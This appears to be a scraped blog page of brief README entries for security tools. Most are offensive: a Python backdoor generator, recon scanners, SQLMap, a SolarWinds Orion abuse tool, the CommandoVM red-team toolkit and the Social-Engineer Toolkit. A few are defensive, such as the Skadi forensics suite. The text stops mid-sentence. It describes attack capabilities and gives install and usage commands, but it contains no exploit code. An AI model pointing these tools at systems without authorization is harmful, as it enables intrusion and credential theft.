image
This project is a Python APT backdoor, optimized for Red Team Post Exploitation Tool, it can generate binary payload or pure python source. The final stub uses polymorphic encryption to give a first obfuscation layer to itself. Deployment AbsoluteZero is a complete software written in Python 2.7 and works both on Windows and Linux platforms, in order to make it working you need to have Python 2.7 installed and then using ‘pip’ install the requirements.txt file. Remember that to compile binaries for Windows you have to run the entire software a Microsoft platform seen that pyinstaller doesn’t allow cross-platform compiling without using _ vine _ . Make sure that Python installation folder is set on ‘ _ C:/Python27 _ ‘ to avoid binary compiling troubles. Download AbsoluteZero

image
Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target. Installation git clone https://github.com/j3ssie/Osmedeus cd Osmedeus ./install.sh This install only focus on Kali linux, check more install on Wiki page How to use If you have no idea what are you doing just type the command below or check out the Advanced Usage ./osmedeus.py -t example.com Using Docker Check out docker-osmedeus by mabnavarrete for docker installation and this wiki for more detail. Features Subdomain Scan. Subdomain TakeOver Scan. Screenshot the target. Basic recon like Whois, Dig info. Web Technology detection. IP Discovery. CORS Scan. SSL Scan. Wayback Machine Discovery. URL Discovery. Headers Scan. Port Scan. Vulnerable Scan. Seperate workspaces to store all scan output and details logging. REST API. React Web UI . Support Continuous Scan. Slack notifications. Easily view report from commnad line. Check this Wiki page for more detail about each module. Demo Example Commands # normal routine ./osmedeus.py -t example.com # normal routine but slow speed on subdomain module ./osmedeus.py -t example.com –slow ‘subdomain’ # direct mode examples ./osmedeus.py -m portscan -i “1.2.3.4/24” ./osmedeus.py -m portscan -I list_of_targets.txt -t result_folder ./osmedeus.py -m “portscan,vulnscan” -i “1.2.3.4/24” -t result_folder ./osmedeus.py -m “assets” -i “example.com” ./osmedeus.py -m “assets,dirb” -i “example.com” # report mode ./osemdeus.py -t example.com –report list ./osemdeus.py -t example.com –report sum ./osemdeus.py -t example.com -m subdomain –report short ./osemdeus.py -t example.com -m “subdomain, portscan” –report full More options Basic Usage =========== python3 osmedeus.py -t python3 osmedeus.py -T python3 osmedeus.py -m [-i |-I ] [-t workspace_name] python3 osmedeus.py –report -t [-m ] Advanced Usage ============== [*] List all module python3 osmedeus.py -M [*] List all report mode python3 osmedeus.py –report help [*] Running with specific module python3 osmedeus.py -t -m -i [*] Example command python3 osmedeus.py -m subdomain -t example.com python3 osmedeus.py -t example.com –slow “subdomain” python3 osmedeus.py -t sample2 -m vuln -i hosts.txt python3 osmedeus.py -t sample2 -m dirb -i /tmp/list_of_hosts.txt Remote Options ============== –remote REMOTE Remote address for API, (default: h ttps://127.0.0.1:5000) –auth AUTH Specify authentication e.g: –auth=”username:password” See your config file for more detail (default: core/config.conf) –client just run client stuff in case you ran the flask server before More options ============== –update Update lastest from git -c CONFIG, –config CONFIG Specify config file (default: core/config.conf) -w WORKSPACE, –workspace WORKSPACE Custom workspace folder -f, –force force to run the module again if output exists -s, –slow “all” All module running as slow mode -s, –slow “subdomain” Only running slow mode in subdomain module –debug Just for debug purpose Disclaimer Most of this tool done by the authors of the tool that list in CREDITS.md . I’m just put all the pieces together, plus some extra magic. This tool is for educational purposes only. You are responsible for your own actions. If you mess something up or break any laws while using this software, it’s your fault, and your fault only. Contribute Please take a look at CONTRIBUTING.md Changelog Please take a look at CHANGELOG.md CREDITS Please take a look at CREDITS.md Contact @j3ssiejjj Download Osmedeus

image
Doing HTB or other CTFs enumeration against targets with HTTP(S) can become trivial. It can get tiresome to always run the same script/tests on every box eg. nmap, nikto, dirb and so on. A one-click on target with automatic reports coming solves the issue. Furthermore, with a script the enum process can be optimized while saving time for hacker. This is what CPH:SEC WAES or _ Web Auto Enum & Scanner _ is created for. WAES runs 4 steps of scanning against target (see more below) to optimize the time spend scanning. While multi core or multi-threaded scanning could be implemented it will almost surely get boxes to hang and so is undesirable. From current version and forward WAES will include an install script (see blow) as project moves from alpha to beta phase. WAES could have been developed in python but good bash projects are need to learn bash. WAES is currently made for CTF boxes but is moving towards online uses (see todo section) To install: 1. $> git clone https://github.com/Shiva108/WAES.git 2. $> cd WAES 2. $> sudo ./install.sh Make sure directories are set correctly in supergobuster.sh. Should be automatic with Kali & Parrot Linux. Standard directories for lists : SecLists/Discovery/Web-Content & SecLists/Discovery/Web-Content/CMS Kali / Parrot directory list : /usr/share/wordlists/dirbuster/ To run WAES Web Auto Enum & Scanner – Auto enums website(s) and dumps files as result. ######################################################################## Web Auto Enum & Scanner Auto enums website(s) and dumps files as result ######################################################################## Usage: waes.sh -u {IP} waes.sh -h -h shows this help -u IP to test eg. 10.10.10.123 -p port nummer (default=80) Example: ./waes.sh -u 10.10.10.130 -p 8080 Enumeration Process / Method WAES runs .. Step 0 – Passive scan – (disabled in the current version) whatweb – aggressive mode OSIRA (same author) – looks for subdomains Step 1 – Fast scan wafw00 – firewall detection nmap with http-enum Step 2 – Scan – in-depth nmap – with NSE scripts: http-date,http-title,http-server-header,http-headers,http-enum,http-devframework,http-dombased-xss,http-stored-xss,http-xssed,http-cookie-flags,http-errors,http-grep,http-traceroute nmap with vulscan (CVSS 5.0+) nikto – with evasion A and all CGI dirs uniscan – all tests except stress test (qweds) Step 3 – Fuzzing super gobuster gobuster with multiple lists dirb with multiple lists xss scan (to come) .. against target while dumping results files in report/ folder. To Do Implement domain as input Add XSS scan Add SSL/TLS scanning Add domain scans Add golismero Add dirble Add progressbar Add CMS detection Add CMS specific scans Download WAES

image
BADministration is a tool which interfaces with management or administration applications from an offensive standpoint. It attempts to provide offsec personnel a tool with the ability to identify and leverage these non-technical vulnerabilities. As always: use for good, promote security, and fight application propagation. Sorry for using python2.7, I found a lot of the vendor APIs would only run on 2.7 and I’m not experienced enough to mix and match python versions. Application Propagation In my opinion, we often do a fantastic job of network segmentation and we’re starting to catch on with domain segmentation; however, one area I often see us fall down is application segmentation. Application segmentation is similar to network segmentation in that we’re trying to reduce the exposure of a critical zone from a less trusted zone if it were to become exploited. Administration applications often have privileged access to all its clients, if an attacker lands on that administration application there is a good chance all the clients can become exploited as well. Application segmentation tries to ensure that server-to-client relationships don’t cross any trust boundaries. For example, if your admin network is trust level 100 and it’s administered by your NMS server, your NMS server should be considered trust level 100. References https://www.codeproject.com/Articles/716227/Csharp-How-to-Scan-a-Process-Memory http://www.exploit-monday.com/2012/03/powershell-live-memory-analysis-tools.html https://stackoverflow.com/questions/46440950/require-and-option-only-if-a-choice-is-made-when-using-click/46662521 Installation There will be a collection of python scripts, exes, and who knows what; for the central python module it’s pretty simple pip install -r requirements.txt Current Modules Solarwinds Orion solarwinds-enum – Module used to enumerate clients of Orion solarwinds-listalerts – Lists Orion alerts and draws attention to malicious BADministration alerts solarwinds-alertremove – Removes the malicious alert solarwinds-syscmd – Executes a system command on the Orion server via malicious alert Standalone x64 4.5 .NET BADministration_SWDump.exe – Scrapes memory for WMI credentials used by Orion. Can consume large amounts of memory, use at your own risk Compile me as x64 Check us out at https://ijustwannared.team https://twitter.com/cpl3h https://twitter.com/DarknessCherry Download BADministration

image
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Features Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band . Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns . Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack . Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables . This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. Installation You can download the latest tarball by clicking here or latest zipball by clicking here . Preferably, you can download sqlmap by cloning the Git repository: git clone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform. Usage To get a list of basic options and switches use: python sqlmap.py -h To get a list of all options and switches use: python sqlmap.py -hh You can find a sample run here . To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user’s manual . Demo Links Homepage: http://sqlmap.org Download: .tar.gz or .zip Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom Issue tracker: https://github.com/sqlmapproject/sqlmap/issues User’s manual: https://github.com/sqlmapproject/sqlmap/wiki Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ Twitter: @sqlmap Demos: http://www.youtube.com/user/inquisb/videos Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots Translations Bulgarian Chinese Croatian French Greek Indonesian Italian Japanese Portuguese Spanish Turkish Download SQLMap v1.3.8

image
Welcome to CommandoVM – a fully customizable, Windows-based security distribution for penetration testing and red teaming. For detailed install instructions or more information please see our blog Installation (Install Script) Requirements Windows 7 Service Pack 1 or Windows 10 60 GB Hard Drive 2 GB RAM Recommended Windows 10 80+ GB Hard Drive 4+ GB RAM 2 network adapters Enable Virtualization support for VM REQUIRED FOR KALI OR DOCKER Instructions Standard install Create and configure a new Windows Virtual Machine Ensure VM is updated completely. You may have to check for updates, reboot, and check again until no more remain Take a snapshot of your machine! Download and copy install.ps1 on your newly configured machine. Open PowerShell as an Administrator Enable script execution by running the following command: Set-ExecutionPolicy Unrestricted Finally, execute the installer script as follows: .install.ps1 You can also pass your password as an argument: .install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work. Custom install Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder. Decompress the zip and edit the ${Env:UserProfile}Downloadscommando-vm-mastercommando-vm-masterprofile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository. Open an administrative PowerShell window and enable script execution. Set-ExecutionPolicy Unrestricted -f Change to the unzipped project directory. cd ${Env:UserProfile}Downloadscommando-vm-mastercommando-vm-master Execute the install with the -profile_file argument. .install.ps1 -profile_file .profile.json For more detailed instructions about custom installations, see our blog Installing a new package Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system: cinst github Staying up to date Type the following command to update all of the packages to the most recent version: cup all Installed Tools Active Directory Tools Remote Server Administration Tools (RSAT) SQL Server Command Line Utilities Sysinternals Command & Control Covenant PoshC2 WMImplant WMIOps Developer Tools Dep Git Go Java Python 2 Python 3 (default) Ruby Ruby Devkit Visual Studio 2017 Build Tools (Windows 10) Visual Studio Code Docker Amass SpiderFoot Evasion CheckPlease Demiguise DefenderCheck DotNetToJScript Invoke-CradleCrafter Invoke-DOSfuscation Invoke-Obfuscation Invoke-Phant0m Not PowerShell (nps) PS>Attack PSAmsi Pafishmacro PowerLessShell PowerShdll StarFighters Exploitation ADAPE-Script API Monitor CrackMapExec CrackMapExecWin DAMP EvilClippy Exchange-AD-Privesc FuzzySec’s PowerShell-Suite FuzzySec’s Sharp-Suite Generate-Macro GhostPack Rubeus SafetyKatz Seatbelt SharpDPAPI SharpDump SharpRoast SharpUp SharpWMI GoFetch Impacket Invoke-ACLPwn Invoke-DCOM Invoke-PSImage Invoke-PowerThIEf Juicy Potato Kali Binaries for Windows LuckyStrike MetaTwin Metasploit Mr. Unikod3r’s RedTeamPowershellScripts NetshHelperBeacon Nishang Orca PSReflect PowerLurk PowerPriv PowerSploit PowerUpSQL PrivExchange RottenPotatoNG Ruler SharpClipHistory SharpExchangePriv SharpExec SpoolSample SharpSploit UACME impacket-examples-windows vssown Vulcan Information Gathering ADACLScanner ADExplorer ADOffline ADRecon BloodHound dnsrecon FOCA Get-ReconInfo GoBuster GoWitness NetRipper Nmap PowerView Dev branch included SharpHound SharpView SpoolerScanner Watson Kali Linux kali-linux-default kali-linux-xfce VcXsrv Networking Tools Citrix Receiver OpenVPN Proxycap PuTTY Telnet VMWare Horizon Client VMWare vSphere Client VNC-Viewer WinSCP Windump Wireshark Password Attacks ASREPRoast CredNinja DomainPasswordSpray DSInternals Get-LAPSPasswords Hashcat Internal-Monologue Inveigh Invoke-TheHash KeeFarce KeeThief LAPSToolkit MailSniper Mimikatz Mimikittenz RiskySPN SessionGopher Reverse Engineering DNSpy Flare-Floss ILSpy PEview Windbg x64dbg Utilities 7zip Adobe Reader AutoIT Cmder CyberChef Explorer Suite Gimp Greenshot Hashcheck Hexchat HxD Keepass MobaXterm Mozilla Thunderbird Neo4j Community Edition Notepad++ Pidgin Process Hacker 2 SQLite DB Browser Screentogif Shellcode Launcher Sublime Text 3 TortoiseSVN VLC Media Player Winrar yEd Graph Tool Vulnerability Analysis AD Control Paths Egress-Assess Grouper2 NtdsAudit PwndPasswordsNTLM zBang Web Applications Burp Suite Fiddler Firefox OWASP Zap Subdomain-Bruteforce Wfuzz Wordlists FuzzDB PayloadsAllTheThings SecLists Probable-Wordlists RobotsDisallowed Legal Notice This download configuration script is provided to assist penetration testers in creating handy and versatile toolboxes for offensive engagements. It provides a convenient interface for them to obtain a useful set of pentesting Tools directly from their original sources. Installation and use of this script is subject to the Apache 2.0 License. You as a user of this script must review, accept and comply with the license terms of each downloaded/installed package listed below. By proceeding with the installation, you are accepting the license terms of each package, and acknowledging that your use of each package will be subject to its respective license terms. List of package licenses: http://technet.microsoft.com/en-us/sysinternals/bb469936 https://github.com/stufus/ADOffline/blob/master/LICENCE.md https://github.com/HarmJ0y/ASREPRoast/blob/master/LICENSE https://github.com/BloodHoundAD/BloodHound/blo b/master/LICENSE.md https://github.com/Arvanaghi/CheckPlease/blob/master/LICENSE https://github.com/cobbr/Covenant/blob/master/LICENSE https://github.com/byt3bl33d3r/CrackMapExec/blob/master/LICENSE https://github.com/Raikia/CredNinja/blob/master/LICENSE https://github.com/MichaelGrafnetter/DSInternals/blob/master/LICENSE.md https://github.com/tyranid/DotNetToJScript/blob/master/LICENSE https://github.com/FortyNorthSecurity/Egress-Assess/blob/master/LICENSE https://github.com/cobbr/Elite/blob/master/LICENSE https://github.com/GoFetchAD/GoFetch/blob/master/LICENSE.md http://www.gnu.org/licenses/gpl.html https://github.com/Kevin-Robertson/Inveigh/blob/master/LICENSE.md https://github.com/danielbohannon/Invoke-CradleCrafter/blob/master/LICENSE https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/LICENSE https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/LICENSE https://github.com/Kevin-Robertson/Invoke -TheHash/blob/master/LICENSE.md https://github.com/denandz/KeeFarce/blob/master/LICENSE https://github.com/HarmJ0y/KeeThief/blob/master/LICENSE https://github.com/gentilkiwi/mimikatz https://github.com/nettitude/PoshC2/blob/master/LICENSE https://github.com/Mr-Un1k0d3r/PowerLessShell/blob/master/LICENSE.md https://github.com/G0ldenGunSec/PowerPriv/blob/master/LICENSE https://github.com/p3nt4/PowerShdll/blob/master/LICENSE.md https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/LICENSE https://github.com/PowerShellMafia/PowerSploit/blob/master/LICENSE https://github.com/PowerShellMafia/PowerSploit/blob/master/LICENSE https://github.com/dirkjanm/PrivExchange/blob/master/LICENSE https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts/blob/master/LICENSE.md https://github.com/cyberark/RiskySPN/blob/master/LICENSE.md https://github.com/GhostPack/Rubeus/blob/master/LICENSE https://github.com/GhostPack/SafetyKatz/blob/mas ter/LICENSE https://github.com/NickeManarin/ScreenToGif/blob/master/LICENSE.txt https://github.com/GhostPack/Seatbelt https://github.com/danielmiessler/SecLists/blob/master/LICENSE https://github.com/Arvanaghi/SessionGopher https://github.com/GhostPack/SharpDPAPI/blob/master/LICENSE https://github.com/GhostPack/SharpDump/blob/master/LICENSE https://github.com/tevora-threat/SharpView/blob/master/LICENSE https://github.com/GhostPack/SharpRoast/blob/master/LICENSE https://github.com/GhostPack/SharpUp/blob/master/LICENSE https://github.com/GhostPack/SharpWMI/blob/master/LICENSE https://github.com/leechristensen/SpoolSample/blob/master/LICENSE https://github.com/vletoux/SpoolerScanner/blob/master/LICENSE http://www.sublimetext.com/eula https://github.com/HarmJ0y/TrustVisualizer/blob/master/LICENSE https://github.com/hfiref0x/UACME/blob/master/LICENSE.md https://github.com/FortyNorthSecurity/WMIOps/blob/master/LICENSE htt ps://github.com/FortyNorthSecurity/WMImplant/blob/master/LICENSE http://www.adobe.com/products/eulas/pdfs/Reader10_combined-20100625_1419.pdf http://www.rohitab.com/apimonitor http://www.autoitscript.com/autoit3/docs/license.htm https://portswigger.net/burp http://www.citrix.com/buy/licensing/agreements.html https://github.com/cmderdev/cmder/blob/master/LICENSE https://github.com/nccgroup/demiguise/blob/master/LICENSE.txt http://www.telerik.com/purchase/license-agreement/fiddler https://www.mozilla.org/en-US/MPL/2.0/ https://github.com/fireeye/flare-floss https://github.com/fuzzdb-project/fuzzdb/blob/master/_copyright.txt https://www.gimp.org/about/ https://www.google.it/intl/en/chrome/browser/privacy/eula_text.html https://github.com/sensepost/gowitness/blob/master/LICENSE.txt https://github.com/hashcat/hashcat/blob/master/docs/license.txt https://www.gnu.org/licenses/gpl-2.0.html https://mh-nexus.de/en/hxd/license .php https://github.com/SecureAuthCorp/impacket/blob/master/LICENSE https://github.com/SecureAuthCorp/impacket/blob/master/LICENSE https://www.kali.org/about-us/ http://keepass.info/help/v2/license.html https://github.com/putterpanda/mimikittenz http://mobaxterm.mobatek.net/license.html http://neo4j.com/open-source-project/ https://github.com/samratashok/nishang/blob/master/LICENSE https://svn.nmap.org/nmap/COPYING https://github.com/Ben0xA/nps/blob/master/LICENSE https://openvpn.net/index.php/license.html https://www.microsoft.com/en-us/servicesagreement/ https://github.com/joesecurity/pafishmacro/blob/master/LICENSE https://hg.pidgin.im/pidgin/main/file/f02ebb71b5e3/COPYING http://www.proxycap.com/eula.pdf http://www.chiark.greenend.org.uk/~sgtatham/putty/licence.html https://support.microsoft.com/en-us/gp/mats_eula https://raw.githubusercontent.com/sqlitebrowser/sqlitebrowser/master/LICENSE http://technet .microsoft.com/en-us/sysinternals/bb469936 http://www.mozilla.org/en-US/legal/eula/thunderbird.html http://www.videolan.org/legal.html http://www.vmware.com/download/eula/universal_eula.html https://www.vmware.com/help/legal.html https://www.realvnc.com/legal/ https://code.visualstudio.com/License http://go.microsoft.com/fwlink/?LinkID=251960 http://opensource.org/licenses/BSD-3-Clause https://winscp.net/docs/license http://www.gnu.org/copyleft/gpl.html https://github.com/x64dbg/x64dbg/blob/development/LICENSE https://www.yworks.com/products/yed/license.html http://www.apache.org/licenses/LICENSE-2.0 https://github.com/Dionach/NtdsAudit/blob/master/LICENSE https://github.com/ANSSI-FR/AD-control-paths/blob/master/LICENSE.txt https://github.com/OJ/gobuster/blob/master/LICENSE https://github.com/xmendez/wfuzz/blob/master/LICENSE https://github.com/dafthack/DomainPasswordSpray/blob/master/LICENSE https://github. com/nettitude/PoshC2_Python/blob/master/LICENSE https://github.com/ElevenPaths/FOCA/blob/master/LICENSE.txt https://github.com/ohpe/juicy-potato/blob/master/LICENSE https://github.com/NytroRST/NetRipper/blob/master/LICENSE.TXT https://github.com/unixrox/prebellico/blob/master/LICENSE.md https://github.com/rasta-mouse/Watson/blob/master/LICENSE.txt https://github.com/berzerk0/Probable-Wordlists/blob/master/License.txt https://github.com/cobbr/SharpSploit/blob/master/LICENSE Download Commando-Vm

image
(pronounced “SKAH-Dee”: similar to Scotty but with a d sound) is a giantess and goddess of hunting in Norse mythology Purpose Skadi is a free, open source collection of tools that enables the collection, processing and advanced analysis of forensic artifacts and images. It works on MacOS, Windows, and Linux machines. It scales to work effectively on laptops, desktops, servers, the cloud, and can be installed on top of hardened / gold disk images. How to Get Started and Support Download Latest Release Available in OVA, Vagrant and Signed Installer formats Download the Latest Release Installation Instructions Starting Skadi on Docker Instructions Vagrant Installation Instructions OVA Installation Instructions Signed Installer Instructions Skadi Portal This portal allows easy access to Skadi tools. By default it is available at the IP address of the Skadi Server. The default credentials are: Username: skadi Password: skadi Access the portal through a web browser at the IP address of the server. In this example the server is 192.168.1.2 while Vagrant and Docker will create a link to localhost Example: http://192.168.1.2 Vagrant Example: http://localhost Included Tools The tools are combined into one platform that all work together to provide the ability to collect data, convert the bits and bytes to words and numbers, and analyze the results quickly and easily. This enables the ability to rapidly hunt for host based evidence of a malicious activities quickly and accurately. CDQR CyberChef CyLR Docker ElasticSearch Glances Grafana Portainer Kibana Yeti Plaso TimeSketch Yeti (Threat Intelligence Tool) Kibana and TimeSketch Included 11 Kibana Dashboards TimeSketch Videos and Media Alamo ISSA 2018 Slides: Reviews CCF-VM components, walkthrough of how to install GCP version and discuss automation possibilities and risks SANS DFIR Summit 2017 Video: A talk about using CCF-VM for Digital Forensics and Incident Response (DFIR) ISC2 Security Congress 2017 Slides: Another talk about using CCF-VM for Digital Forensics and Incident Response (DFIR) DEFCON 25 4-hour Workshop 2017 Slides: Free and Easy DFIR Triage for Everyone OSDFCON 2017 Slides: Walk-through different techniques that are required to provide forensics results for Windows and *nix environments (Including CyLR and CDQR) Skadi Wiki Page The answers to common questions and information about how to get started with Skadi is stored in the Skadi Wiki Pages . Skadi Community There is a Slack community setup for developers and users of the Skadi ecosystem. It is a safe place to ask questions and share information. Join the Skadi Community Slack Skadi Add-on Packs Skadi add-on packs are installed on top of the base Skadi VM to provide extra functionality Skadi Pack 01: Automation : Provides two methods of integrating with any Automation tool: gRPC API or using SSH Skadi Pack 02: Secure Networking : Updates the firewall and authenticated reverse proxy for use in network deployment. Provides instructions for obtaining TLS/SSL certificates Thank you to everyone who has helped, and those that continue to, making this project a reality. Special Thanks to: The team from Komand for their advice and support on all things Automation Jackie & Jason from @SpyglassSec for their guidance Every single one of the contributors who’s efforts made the automation Addon Pack possible CREATOR Alan Orlikoski Download Skadi

image
KRF is a K ernelspace R andomized F aulter. It currently supports the Linux and FreeBSD kernels. What? Fault injection is a software testing technique that involves inducing failures (“faults”) in the functions called by a program. If the callee has failed to perform proper error checking and handling, these faults can result in unreliable application behavior or exploitable vulnerabilities. Unlike the many userspace fault injection systems out there, KRF runs in kernelspace via a loaded module. This has several advantages: It works on static binaries, as it does not rely on LD_PRELOAD for injection. Because it intercepts raw syscalls and not their libc wrappers, it can inject faults into calls made by syscall(3) or inline assembly. It’s probably faster and less error-prone than futzing with dlsym . There are also several disadvantages: You’ll probably need to build it yourself. It probably only works on x86(_64), since it twiddles cr0 manually. There is probably an architecture-independent way to do that in Linux, somewhere. It’s essentially a rootkit. You should definitely never, ever run it on a non-testing system. It probably doesn’t cover everything that the Linux kernel expects of syscalls, and may destabilize its host in weird and difficult to reproduce ways. How does it work? KRF rewrites the Linux or FreeBSD system call table: when configured via krfctl , KRF replaces faultable syscalls with thin wrappers. Each wrapper then performs a check to see whether the call should be faulted using a configurable targeting system capable of targeting a specific personality(2) , PID, UID, and/or GID. If the process shouldn’t be faulted, the original syscall is invoked. Finally, the targeted call is faulted via a random failure function. For example, a read(2) call might receive one of EBADF , EINTR , EIO , and so on. Setup Compatibility NOTE : If you have Vagrant, just use the Vagrantfile and jump to the build steps. KRF should work on any recent-ish (4.15+) Linux kernel with CONFIG_KALLSYMS=1 . This includes the default kernel on Ubuntu 18.04 and probably many other recent distros. Dependencies NOTE : Ignore this if you’re using Vagrant. Apart from a C toolchain (GCC is probably necessary for Linux), KRF’s only dependencies should be libelf , the kernel headers, and Ruby (for code generation). GNU Make is required on all platforms; FreeBSD _ additionally _ requires BSD Make. For systems with apt : sudo apt install libelf-dev ruby linux-headers-$(uname -r) Building git clone https://github.com/trailofbits/krf && cd krf make -j$(nproc) or, if you’re using Vagrant: git clone https://github.com/trailofbits/krf && cd krf vagrant up linux && vagrant ssh linux # inside the VM cd /vagrant make -j$(nproc) or, for FreeBSD: git clone https://github.com/trailofbits/krf && cd krf cd vagrant up freebsd && vagrant ssh freebsd # inside the VM cd /vagrant gmake # NOT make! Usage KRF has three components: A kernel module ( krfx ) An execution utility ( krfexec ) A control utility ( krfctl ) To load the kernel module, run make insmod . To unload it, run make rmmod . KRF begins in a neutral state: no syscalls will be intercepted or faulted until the user specifies some behavior via krfctl : no induced faults, even with KRF loaded ls tell krf to fault read(2) and write(2) calls note that krfctl requires root privileges sudo ./src/krfctl/krfctl -F ‘read,write’ tell krf to fault any program with a personality of 28 (the value set by krfexec) sudo ./src/krfctl/krfctl -T personality=28 may fault! ./src/krfexec/krfexec ls krfexec will pass options correctly as well ./src/krfexec/krfexec echo -n ‘no newline’ clear the fault specification sudo ./src/krfctl/krfctl -c clear the targeting specification sudo ./src/krfctl/krfctl -C no induced faults, since no syscalls are being faulted ./src/krfexec/krfexec firefox On FreeBSD, krfexec requires root privileges. By default, it will attempt to use SUDO_UID and the username returned by getlogin_r to return to a non-root user before executing the target. To force a particular UID, export REAL_UID , e.g.: REAL_UID=1000 sudo ./src/krfexec/krfexec ls Configuration NOTE : Most users should use krfctl instead of manipulating these files by hand. In FreeBSD, these same values are accessible through sysctl krf.whatever instead of procfs. /proc/krf/rng_state This file allows a user to read and modify the internal state of KRF’s PRNG. For example, each of the following will correctly update the state: echo “1234” | sudo tee /proc/krf/rng_state echo “0777” | sudo tee /proc/krf/rng_state echo “0xFF” | sudo tee /proc/krf/rng_state The state is a 32-bit unsigned integer; attempting to change it beyond that will fail. /proc/krf/targeting This file allows a user set the values used by KRF for syscall targeting. NOTE : KRF uses a default personality not currently used by the Linux kernel by default. If you change this, you should be careful to avoid making it something that Linux cares about. man 2 personality has the details. echo “0 28” | sudo tee /proc/krf/targeting A personality of 28 is hardcoded into krfexec . /proc/krf/probability This file allows a user to read and write the probability of inducing fault for a given (faultable) syscall. The probability is represented as a reciprocal, e.g. 1000 means that, on average, 0.1% of faultable syscalls will be faulted. echo “100000” | sudo tee /proc/krf/probability /proc/krf/control This file controls the syscalls that KRF faults. NOTE : Most users should use krfctl instead of interacting with this file directly — the former will perform syscall name-to-number translation automatically and will provide clearer error messages when things go wrong. # replace the syscall in slot 0 (usually SYS_read) with its faulty wrapper echo “0” | sudo tee /proc/krf/control Passing any number greater than KRF_NR_SYSCALLS will cause KRF to flush the entire syscall table, returning it to the neutral state. Since KRF_NR_SYSCALLS isn’t necessarily predictable for arbitrary versions of the Linux kernel, choosing a large number (like 65535) is fine. Passing a valid syscall number that lacks a fault injection wrapper will cause the write(2) to the file to fail with EOPNOTSUPP . /proc/krf/log_faults This file controls whether or not KRF emits kernel logs on faulty syscalls. By default, no logging messages are emitted. NOTE : Most users should use krfctl instead of interacting with this file directly. # enable fault logging echo “1” | sudo tee /proc/krf/log_faults # disable fault logging echo “0” | sudo tee /proc/krf/log_faults # read the logging state cat /proc/krf/log_faults Download Krf

image
Copyright 2019 The Social-Engineer Toolkit (SET) Written by: David Kennedy (ReL1K) Company: TrustedSec DISCLAIMER: This is _ only _ for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE under readme/LICENSE for the licensing of SET. SET Tutorial For a full document on how to use SET, visit the SET user manual . Features The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio. Bugs and enhancements For bug reports or enhancements, please open an issue here. Supported platforms Linux Mac OS X Installation Resolve dependencies _ Ubuntu/Debian System _ Linux Mac OS X (experimental) Installation Install via requirements.txt $ pip install -r requirements.txt Install SET _ All OSs _ $ git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ $ cd set $ pip install -r requirements.txt Download Social-Engineer-Toolkit

image
Project iKy is a tool that collects information from an email and shows results in a nice visual interface. Visit the Gitlab Page of the Project Video Installation Clone repository git clone https://gitlab.com/kennbroorg/iKy.git Install Backend Redis You must install Redis wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make sudo make install And turn on the server in a terminal redis-server Python stuff and Celery You must install the libraries inside requirements.txt pip install -r requirements.txt And turn on Celery in another terminal, within the directory backend ./celery.sh Finally, again, in another terminal turn on backend app from directory backend python app.py Install Frontend Node First of all, install nodejs . Dependencies Inside the directory frontend install the dependencies npm install Turn on Frontend Server Finally, to run frontend server, execute: npm start Browser Open the browser in this url Config API Keys Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed. Fullcontact: Generate the APIs from here Twitter: Generate the APIs from here Linkedin: Only the user and password of your account must be loaded Disclaimer Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the “other” use). Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence. Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn’t show “nice” things that you expect to see, try other e-mails before you remember my mother. If you still do not see the “nice” things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator nor 